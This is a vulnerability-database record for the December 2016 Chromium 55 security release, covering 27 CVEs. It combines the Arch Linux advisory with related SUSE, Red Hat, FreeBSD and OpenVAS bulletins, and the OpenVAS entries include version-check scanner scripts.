{"type": "archlinux", "published": "2016-12-03T00:00:00", "href": "https://lists.archlinux.org/pipermail/arch-security/2016-December/000779.html", "hashmap": [{"key": "affectedPackage", "hash": "8c06f2284eb24779cc41913d22721b57"}, {"key": "bulletinFamily", "hash": "4913a9178621eadcdf191db17915fbcb"}, {"key": "cvelist", "hash": "db9032c818c123cd718d9b01032666b8"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "dd919ce94337b37aed9177857cf4faac"}, {"key": "href", "hash": "ddba90896882c1b5d695d35128400e93"}, {"key": "modified", "hash": "6214c9d7bad561bfa9ce962e38084bc7"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "6214c9d7bad561bfa9ce962e38084bc7"}, {"key": "references", "hash": "ed519ad38db3d7c1e8d250a6b3f32575"}, {"key": "reporter", "hash": "ad4f3f64ec0b99ddb498b4c19d7c45be"}, {"key": "title", "hash": "5c4f8da0e394d0520d2db19dede94475"}, {"key": "type", "hash": "97b7ea39a0d325698668a38eb5f0e5da"}], "bulletinFamily": "unix", "cvss": {"vector": "NONE", "score": 0.0}, "viewCount": 480, "history": [], "lastseen": "2016-12-04T17:23:10", "objectVersion": "1.2", "reporter": "Arch Linux", "title": "chromium: multiple issues", "enchantments": {"score": {"value": 6.8, "vector": "NONE", "modified": "2016-12-04T17:23:10"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310810230", "OPENVAS:1361412562310810229", "OPENVAS:1361412562310851453", "OPENVAS:1361412562310810228", "OPENVAS:1361412562310842990", "OPENVAS:1361412562310872151", "OPENVAS:1361412562310872153", "OPENVAS:1361412562310872576", "OPENVAS:703731", "OPENVAS:1361412562310703731"]}, {"type": "nessus", "idList": ["FREEBSD_PKG_603FE0A1BB2611E68E5A3065EC8FD3EC.NASL", "REDHAT-RHSA-2016-2919.NASL", "OPENSUSE-2016-1453.NASL", "MACOSX_GOOGLE_CHROME_55_0_2883_75.NASL", "GOOGLE_CHROME_55_0_2883_75.NASL", "GENTOO_GLSA-201612-11.NASL", "UBUNTU_USN-3153-1.NASL", "FEDORA_2016-E0E1CB2B2B.NASL", "FEDORA_2016-A815B7BF5D.NASL", "FEDORA_2017-AE1FDE5FB8.NASL"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2016:3108-1", "OPENSUSE-SU-2017:0563-1"]}, {"type": "freebsd", "idList": ["603FE0A1-BB26-11E6-8E5A-3065EC8FD3EC"]}, {"type": "redhat", "idList": ["RHSA-2016:2919"]}, {"type": "threatpost", "idList": ["THREATPOST:8824503BC1A2C5007509D80EDDF5E01C"]}, {"type": "gentoo", "idList": ["GLSA-201612-11"]}, {"type": "ubuntu", "idList": ["USN-3153-1"]}, {"type": "debian", "idList": ["DEBIAN:DSA-3731-1:02966"]}, {"type": "cve", "idList": ["CVE-2016-5224", "CVE-2016-9650", "CVE-2016-5210", "CVE-2016-5222", "CVE-2016-9651", "CVE-2016-5209", "CVE-2016-5217", "CVE-2016-5226", "CVE-2016-5205", "CVE-2016-5216"]}, {"type": "kaspersky", "idList": ["KLA10949"]}, {"type": "seebug", "idList": ["SSV:93000", "SSV:92999", "SSV:93001"]}, {"type": "exploitdb", "idList": ["EDB-ID:42175"]}, {"type": "zdt", "idList": ["1337DAY-ID-27954"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142939"]}, {"type": "myhack58", "idList": ["MYHACK58:62201787022"]}], "modified": "2016-12-04T17:23:10"}, "vulnersScore": 6.8}, "id": "ASA-201612-3", "references": ["https://access.redhat.com/security/cve/CVE-2016-9650", "https://access.redhat.com/security/cve/CVE-2016-5212", "https://access.redhat.com/security/cve/CVE-2016-5204", "https://access.redhat.com/security/cve/CVE-2016-5219", "https://access.redhat.com/security/cve/CVE-2016-5223", "https://access.redhat.com/security/cve/CVE-2016-5207", "https://access.redhat.com/security/cve/CVE-2016-5203", "https://access.redhat.com/security/cve/CVE-2016-5215", "https://access.redhat.com/security/cve/CVE-2016-5226", "https://access.redhat.com/security/cve/CVE-2016-5211", "https://access.redhat.com/security/cve/CVE-2016-9651", "https://access.redhat.com/security/cve/CVE-2016-5208", "https://access.redhat.com/security/cve/CVE-2016-9652", "https://access.redhat.com/security/cve/CVE-2016-5205", "https://access.redhat.com/security/cve/CVE-2016-5220", "https://googlechromereleases.blogspot.fr/2016/12/stable-channel-update-for-desktop.html", "https://access.redhat.com/security/cve/CVE-2016-5224", "https://access.redhat.com/security/cve/CVE-2016-5206", "https://access.redhat.com/security/cve/CVE-2016-5209", "https://access.redhat.com/security/cve/CVE-2016-5225", "https://access.redhat.com/security/cve/CVE-2016-5217", "https://access.redhat.com/security/cve/CVE-2016-5210", "https://access.redhat.com/security/cve/CVE-2016-5218", "https://access.redhat.com/security/cve/CVE-2016-5213", "https://access.redhat.com/security/cve/CVE-2016-5221", "https://access.redhat.com/security/cve/CVE-2016-5214", "https://access.redhat.com/security/cve/CVE-2016-5216", "https://access.redhat.com/security/cve/CVE-2016-5222"], "cvelist": ["CVE-2016-5224", "CVE-2016-5225", "CVE-2016-5208", "CVE-2016-5217", "CVE-2016-9651", "CVE-2016-5211", "CVE-2016-9652", "CVE-2016-9650", "CVE-2016-5222", "CVE-2016-5209", "CVE-2016-5205", "CVE-2016-5221", "CVE-2016-5220", "CVE-2016-5219", "CVE-2016-5216", "CVE-2016-5207", "CVE-2016-5215", "CVE-2016-5218", "CVE-2016-5203", "CVE-2016-5213", "CVE-2016-5212", "CVE-2016-5214", "CVE-2016-5223", "CVE-2016-5206", "CVE-2016-5210", "CVE-2016-5204", "CVE-2016-5226"], "hash": "eba94ad2848b4a4fe3ea74e748fba0059a087ed6ac7a5fbcd4de4ef6a38ceb7d", "edition": 1, "affectedPackage": [{"arch": "any", "operator": "lt", "OS": "any", "OSVersion": "any", "packageVersion": "55.0.2883.75-1", "packageName": "chromium", "packageFilename": "UNKNOWN"}], "modified": "2016-12-03T00:00:00", "description": "- CVE-2016-5203 (arbitrary code execution)\n\nAn use after free flaw was found in the PDFium component of the\nChromium browser.\n\n- CVE-2016-5204 (cross-site scripting)\n\nAn universal XSS flaw was found in the Blink component of the Chromium\nbrowser.\n\n- CVE-2016-5205 (cross-site scripting)\n\nAn universal XSS flaw was found in the Blink component of the Chromium\nbrowser.\n\n- CVE-2016-5206 (same-origin policy bypass)\n\nA same-origin bypass flaw was found in the PDFium component of the\nChromium browser.\n\n- CVE-2016-5207 (cross-site scripting)\n\nAn universal XSS flaw was found in the Blink component of the Chromium\nbrowser.\n\n- CVE-2016-5208 (cross-site scripting)\n\nAn universal XSS flaw was found in the Blink component of the Chromium\nbrowser.\n\n- CVE-2016-5209 (arbitrary code execution)\n\nAn out of bounds write flaw was found in the Blink component of the\nChromium browser.\n\n- CVE-2016-5210 (arbitrary code execution)\n\nAn out of bounds write flaw was found in the PDFium component of the\nChromium browser.\n\n- CVE-2016-5211 (arbitrary code execution)\n\nAn use after free flaw was found in the PDFium component of the\nChromium browser.\n\n- CVE-2016-5212 (arbitrary filesystem access)\n\nA local file disclosure flaw was found in the DevTools component of the\nChromium browser.\n\n- CVE-2016-5213 (arbitrary code execution)\n\nAn use after free flaw was found in the V8 component of the Chromium\nbrowser.\n\n- CVE-2016-5214 (insufficient validation)\n\nA file download protection bypass was discovered in the Chromium\nbrowser.\n\n- CVE-2016-5215 (arbitrary code execution)\n\nAn use after free flaw was found in the Webaudio component of the\nChromium browser.\n\n- CVE-2016-5216 (arbitrary code execution)\n\nAn use after free flaw was found in the PDFium component of the\nChromium browser.\n\n- CVE-2016-5217 (insufficient validation)\n\nAn use of unvalidated data flaw was found in the PDFium component of\nthe Chromium browser.\n\n- CVE-2016-5218 (content spoofing)\n\nAn address spoofing flaw was found in the Omnibox component of the\nChromium browser.\n\n- CVE-2016-5219 (arbitrary code execution)\n\nAn use after free flaw was found in the V8 component of the Chromium\nbrowser.\n\n- CVE-2016-5220 (arbitrary filesystem access)\n\nA local file access flaw was found in the PDFium component of the\nChromium browser.\n\n- CVE-2016-5221 (arbitrary code execution)\n\nAn integer overflow flaw was found in the ANGLE component of the\nChromium browser.\n\n- CVE-2016-5222 (content spoofing)\n\nAn address spoofing flaw was found in the Omnibox component of the\nChromium browser.\n\n- CVE-2016-5223 (arbitrary code execution)\n\nAn integer overflow flaw was found in the PDFium component of the\nChromium browser.\n\n- CVE-2016-5224 (same-origin policy bypass)\n\nA same-origin bypass flaw was found in the SVG component of the\nChromium browser.\n\n- CVE-2016-5225 (access restriction bypass)\n\nA CSP bypass flaw was found in the Blink component of the Chromium\nbrowser.\n\n- CVE-2016-5226 (cross-site scripting)\n\nA limited XSS flaw was found in the Blink component of the Chromium\nbrowser.\n\n- CVE-2016-9650 (information disclosure)\n\nA CSP referrer disclosure vulnerability has been discovered in the\nChromium browser.\n\n- CVE-2016-9651 (access restriction bypass)\n\nA private property access flaw was found in the V8 component of the\nChromium browser.\n\n- CVE-2016-9652 (arbitrary code execution)\n\nVarious fixes from internal audits, fuzzing and other initiatives."}

{"suse": [{"lastseen": "2017-02-27T11:11:33", "bulletinFamily": "unix", "description": "This update to Chromium 55.0.2883.75 fixes the following vulnerabilities:\n\n - CVE-2016-9651: Private property access in V8\n - CVE-2016-5208: Universal XSS in Blink\n - CVE-2016-5207: Universal XSS in Blink\n - CVE-2016-5206: Same-origin bypass in PDFium\n - CVE-2016-5205: Universal XSS in Blink\n - CVE-2016-5204: Universal XSS in Blink\n - CVE-2016-5209: Out of bounds write in Blink\n - CVE-2016-5203: Use after free in PDFium\n - CVE-2016-5210: Out of bounds write in PDFium\n - CVE-2016-5212: Local file disclosure in DevTools\n - CVE-2016-5211: Use after free in PDFium\n - CVE-2016-5213: Use after free in V8\n - CVE-2016-5214: File download protection bypass\n - CVE-2016-5216: Use after free in PDFium\n - CVE-2016-5215: Use after free in Webaudio\n - CVE-2016-5217: Use of unvalidated data in PDFium\n - CVE-2016-5218: Address spoofing in Omnibox\n - CVE-2016-5219: Use after free in V8\n - CVE-2016-5221: Integer overflow in ANGLE\n - CVE-2016-5220: Local file access in PDFium\n - CVE-2016-5222: Address spoofing in Omnibox\n - CVE-2016-9650: CSP Referrer disclosure\n - CVE-2016-5223: Integer overflow in PDFium\n - CVE-2016-5226: Limited XSS in Blink\n - CVE-2016-5225: CSP bypass in Blink\n - CVE-2016-5224: Same-origin bypass in SVG\n - CVE-2016-9652: Various fixes from internal audits, fuzzing and other\n initiatives\n\n The default bookmarks override was removed.\n\n The following packaging changes are included:\n\n - Switch to system libraries: harfbuzz, zlib, ffmpeg, where available.\n - Chromium now requires harfbuzz &gt;= 1.3.0\n\n", "modified": "2017-02-27T12:08:25", "published": "2017-02-27T12:08:25", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-02/msg00042.html", "id": "OPENSUSE-SU-2017:0563-1", "type": "suse", "title": "Security update for Chromium (important)", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2016-12-13T14:02:36", "bulletinFamily": "unix", "description": "This update to Chromium 55.0.2883.75 fixes the following vulnerabilities:\n\n - CVE-2016-9651: Private property access in V8\n - CVE-2016-5208: Universal XSS in Blink\n - CVE-2016-5207: Universal XSS in Blink\n - CVE-2016-5206: Same-origin bypass in PDFium\n - CVE-2016-5205: Universal XSS in Blink\n - CVE-2016-5204: Universal XSS in Blink\n - CVE-2016-5209: Out of bounds write in Blink\n - CVE-2016-5203: Use after free in PDFium\n - CVE-2016-5210: Out of bounds write in PDFium\n - CVE-2016-5212: Local file disclosure in DevTools\n - CVE-2016-5211: Use after free in PDFium\n - CVE-2016-5213: Use after free in V8\n - CVE-2016-5214: File download protection bypass\n - CVE-2016-5216: Use after free in PDFium\n - CVE-2016-5215: Use after free in Webaudio\n - CVE-2016-5217: Use of unvalidated data in PDFium\n - CVE-2016-5218: Address spoofing in Omnibox\n - CVE-2016-5219: Use after free in V8\n - CVE-2016-5221: Integer overflow in ANGLE\n - CVE-2016-5220: Local file access in PDFium\n - CVE-2016-5222: Address spoofing in Omnibox\n - CVE-2016-9650: CSP Referrer disclosure\n - CVE-2016-5223: Integer overflow in PDFium\n - CVE-2016-5226: Limited XSS in Blink\n - CVE-2016-5225: CSP bypass in Blink\n - CVE-2016-5224: Same-origin bypass in SVG\n - CVE-2016-9652: Various fixes from internal audits, fuzzing and other\n initiatives\n\n The default bookmarks override was removed.\n\n The following packaging changes are included:\n\n - Switch to system libraries: harfbuzz, zlib, ffmpeg, where available.\n - Chromium now requires harfbuzz &gt;= 1.3.0\n\n", "modified": "2016-12-13T13:10:29", "published": "2016-12-13T13:10:29", "id": "OPENSUSE-SU-2016:3108-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-12/msg00050.html", "type": "suse", "title": "Security update for Chromium (important)", "cvss": {"score": 0.0, "vector": "NONE"}}], "redhat": [{"lastseen": "2019-11-22T12:18:51", "bulletinFamily": "unix", "description": "Chromium is an open-source web browser, powered by WebKit (Blink).\n\nThis update upgrades Chromium to version 55.0.2883.75.\n\nSecurity Fix(es):\n\n* Multiple flaws were found in the processing of malformed web content. A web page containing malicious content could cause Chromium to crash, execute arbitrary code, or disclose sensitive information when visited by the victim. (CVE-2016-5203, CVE-2016-5204, CVE-2016-5205, CVE-2016-5206, CVE-2016-5207, CVE-2016-5208, CVE-2016-5209, CVE-2016-5210, CVE-2016-5211, CVE-2016-5212, CVE-2016-5213, CVE-2016-9651, CVE-2016-9652, CVE-2016-5214, CVE-2016-5215, CVE-2016-5216, CVE-2016-5217, CVE-2016-5218, CVE-2016-5219, CVE-2016-5220, CVE-2016-5221, CVE-2016-5222, CVE-2016-5223, CVE-2016-5224, CVE-2016-5225, CVE-2016-5226, CVE-2016-9650)", "modified": "2018-06-07T09:04:29", "published": "2016-12-07T23:07:15", "id": "RHSA-2016:2919", "href": "https://access.redhat.com/errata/RHSA-2016:2919", "type": "redhat", "title": "(RHSA-2016:2919) Important: chromium-browser security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "freebsd": [{"lastseen": "2019-11-22T13:24:51", "bulletinFamily": "unix", "description": "\nGoogle Chrome Releases reports:\n\n36 security fixes in this release\nPlease reference CVE/URL list for details\n\n", "modified": "2016-12-01T00:00:00", "published": "2016-12-01T00:00:00", "id": "603FE0A1-BB26-11E6-8E5A-3065EC8FD3EC", "href": "https://vuxml.freebsd.org/freebsd/603fe0a1-bb26-11e6-8e5a-3065ec8fd3ec.html", "title": "chromium -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-11-22T16:36:36", "bulletinFamily": "scanner", "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "modified": "2019-07-17T00:00:00", "published": "2016-12-05T00:00:00", "id": "OPENVAS:1361412562310810228", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810228", "title": "Google Chrome Security Updates(stable-channel-update-for-desktop-2016-12)-Windows", "type": "openvas", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Google Chrome Security Updates(stable-channel-update-for-desktop-2016-12)-Windows\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810228\");\n script_version(\"2019-07-17T08:15:16+0000\");\n script_cve_id(\"CVE-2016-9651\", \"CVE-2016-5208\", \"CVE-2016-5207\", \"CVE-2016-5206\",\n \"CVE-2016-5205\", \"CVE-2016-5204\", \"CVE-2016-5209\", \"CVE-2016-5203\",\n \"CVE-2016-5210\", \"CVE-2016-5212\", \"CVE-2016-5211\", \"CVE-2016-5213\",\n \"CVE-2016-5214\", \"CVE-2016-5216\", \"CVE-2016-5215\", \"CVE-2016-5217\",\n \"CVE-2016-5218\", \"CVE-2016-5219\", \"CVE-2016-5221\", \"CVE-2016-5220\",\n \"CVE-2016-5222\", \"CVE-2016-9650\", \"CVE-2016-5223\", \"CVE-2016-5226\",\n \"CVE-2016-5225\", \"CVE-2016-5224\", \"CVE-2016-9652\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 08:15:16 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-12-05 12:51:42 +0530 (Mon, 05 Dec 2016)\");\n script_name(\"Google Chrome Security Updates(stable-channel-update-for-desktop-2016-12)-Windows\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws exist due to,\n\n - A private property access error in V8.\n\n - The multiple universal XSS errors in Blink.\n\n - A same-origin bypass error in PDFium.\n\n - An out of bounds write error in Blink.\n\n - The multiple use after free errors.\n\n - An out of bounds write error in PDFium.\n\n - A local file disclosure error in DevTools.\n\n - A file download protection bypass error.\n\n - The usage of unvalidated data in PDFium.\n\n - The multiple address spoofing errors in Omnibox.\n\n - An integer overflow error in ANGLE.\n\n - A local file access error in PDFium.\n\n - A CSP Referrer disclosure error.\n\n - An integer overflow error in PDFium.\n\n - A CSP bypass error in Blink.\n\n - A same-origin bypass error in SVG.\n\n - The various fixes from internal audits, fuzzing and other initiatives.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these\n vulnerabilities will allow remote attackers to bypass security, obtain\n sensitive information and to execute arbitrary code or cause denial of service\n condition.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to 55.0.2883.75 on Windows\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version 55.0.2883.75 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://googlechromereleases.blogspot.in/2016/12/stable-channel-update-for-desktop.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_portable_win.nasl\");\n script_mandatory_keys(\"GoogleChrome/Win/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!chr_ver = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:chr_ver, test_version:\"55.0.2883.75\"))\n{\n report = report_fixed_ver(installed_version:chr_ver, fixed_version:\"55.0.2883.75\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-22T16:37:43", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-16T00:00:00", "published": "2016-12-14T00:00:00", "id": "OPENVAS:1361412562310851453", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851453", "title": "SuSE Update for Chromium openSUSE-SU-2016:3108-1 (Chromium)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2016_3108_1.nasl 12381 2018-11-16 11:16:30Z cfischer $\n#\n# SuSE Update for Chromium openSUSE-SU-2016:3108-1 (Chromium)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851453\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-14 05:54:12 +0100 (Wed, 14 Dec 2016)\");\n script_cve_id(\"CVE-2016-5203\", \"CVE-2016-5204\", \"CVE-2016-5205\", \"CVE-2016-5206\",\n \"CVE-2016-5207\", \"CVE-2016-5208\", \"CVE-2016-5209\", \"CVE-2016-5210\",\n \"CVE-2016-5211\", \"CVE-2016-5212\", \"CVE-2016-5213\", \"CVE-2016-5214\",\n \"CVE-2016-5215\", \"CVE-2016-5216\", \"CVE-2016-5217\", \"CVE-2016-5218\",\n \"CVE-2016-5219\", \"CVE-2016-5220\", \"CVE-2016-5221\", \"CVE-2016-5222\",\n \"CVE-2016-5223\", \"CVE-2016-5224\", \"CVE-2016-5225\", \"CVE-2016-5226\",\n \"CVE-2016-9650\", \"CVE-2016-9651\", \"CVE-2016-9652\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SuSE Update for Chromium openSUSE-SU-2016:3108-1 (Chromium)\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'Chromium'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"This update to Chromium 55.0.2883.75 fixes the following vulnerabilities:\n\n - CVE-2016-9651: Private property access in V8\n\n - CVE-2016-5208: Universal XSS in Blink\n\n - CVE-2016-5207: Universal XSS in Blink\n\n - CVE-2016-5206: Same-origin bypass in PDFium\n\n - CVE-2016-5205: Universal XSS in Blink\n\n - CVE-2016-5204: Universal XSS in Blink\n\n - CVE-2016-5209: Out of bounds write in Blink\n\n - CVE-2016-5203: Use after free in PDFium\n\n - CVE-2016-5210: Out of bounds write in PDFium\n\n - CVE-2016-5212: Local file disclosure in DevTools\n\n - CVE-2016-5211: Use after free in PDFium\n\n - CVE-2016-5213: Use after free in V8\n\n - CVE-2016-5214: File download protection bypass\n\n - CVE-2016-5216: Use after free in PDFium\n\n - CVE-2016-5215: Use after free in Webaudio\n\n - CVE-2016-5217: Use of unvalidated data in PDFium\n\n - CVE-2016-5218: Address spoofing in Omnibox\n\n - CVE-2016-5219: Use after free in V8\n\n - CVE-2016-5221: Integer overflow in ANGLE\n\n - CVE-2016-5220: Local file access in PDFium\n\n - CVE-2016-5222: Address spoofing in Omnibox\n\n - CVE-2016-9650: CSP Referrer disclosure\n\n - CVE-2016-5223: Integer overflow in PDFium\n\n - CVE-2016-5226: Limited XSS in Blink\n\n - CVE-2016-5225: CSP bypass in Blink\n\n - CVE-2016-5224: Same-origin bypass in SVG\n\n - CVE-2016-9652: Various fixes from internal audits, fuzzing and other\n initiatives\n\n The default bookmarks override was removed.\n\n The following packaging changes are included:\n\n - Switch to system libraries: harfbuzz, zlib, ffmpeg, where available.\n\n - Chromium now requires harfbuzz = 1.3.0\");\n script_tag(name:\"affected\", value:\"Chromium on openSUSE Leap 42.1, openSUSE 13.2\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2016:3108_1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE13\\.2\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\nres = \"\";\n\nif(release == \"openSUSE13.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"chromedriver\", rpm:\"chromedriver~55.0.2883.75~148.1\", rls:\"openSUSE13.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"chromedriver-debuginfo\", rpm:\"chromedriver-debuginfo~55.0.2883.75~148.1\", rls:\"openSUSE13.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"chromium\", rpm:\"chromium~55.0.2883.75~148.1\", rls:\"openSUSE13.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"chromium-debuginfo\", rpm:\"chromium-debuginfo~55.0.2883.75~148.1\", rls:\"openSUSE13.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"chromium-debugsource\", rpm:\"chromium-debugsource~55.0.2883.75~148.1\", rls:\"openSUSE13.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"chromium-ffmpegsumo\", rpm:\"chromium-ffmpegsumo~55.0.2883.75~148.1\", rls:\"openSUSE13.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"chromium-ffmpegsumo-debuginfo\", rpm:\"chromium-ffmpegsumo-debuginfo~55.0.2883.75~148.1\", rls:\"openSUSE13.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-22T16:36:46", "bulletinFamily": "scanner", "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "modified": "2019-07-17T00:00:00", "published": "2016-12-05T00:00:00", "id": "OPENVAS:1361412562310810230", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810230", "title": "Google Chrome Security Updates(stable-channel-update-for-desktop-2016-12)-MAC OS X", "type": "openvas", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Google Chrome Security Updates(stable-channel-update-for-desktop-2016-12)-MAC OS X\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810230\");\n script_version(\"2019-07-17T08:15:16+0000\");\n script_cve_id(\"CVE-2016-9651\", \"CVE-2016-5208\", \"CVE-2016-5207\", \"CVE-2016-5206\",\n \"CVE-2016-5205\", \"CVE-2016-5204\", \"CVE-2016-5209\", \"CVE-2016-5203\",\n \"CVE-2016-5210\", \"CVE-2016-5212\", \"CVE-2016-5211\", \"CVE-2016-5213\",\n \"CVE-2016-5214\", \"CVE-2016-5216\", \"CVE-2016-5215\", \"CVE-2016-5217\",\n \"CVE-2016-5218\", \"CVE-2016-5219\", \"CVE-2016-5221\", \"CVE-2016-5220\",\n \"CVE-2016-5222\", \"CVE-2016-9650\", \"CVE-2016-5223\", \"CVE-2016-5226\",\n \"CVE-2016-5225\", \"CVE-2016-5224\", \"CVE-2016-9652\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 08:15:16 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-12-05 12:51:42 +0530 (Mon, 05 Dec 2016)\");\n script_name(\"Google Chrome Security Updates(stable-channel-update-for-desktop-2016-12)-MAC OS X\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws exist due to,\n\n - A private property access error in V8.\n\n - The multiple universal XSS errors in Blink.\n\n - A same-origin bypass error in PDFium.\n\n - An out of bounds write error in Blink.\n\n - The multiple use after free errors.\n\n - An out of bounds write error in PDFium.\n\n - A local file disclosure error in DevTools.\n\n - A file download protection bypass error.\n\n - The usage of unvalidated data in 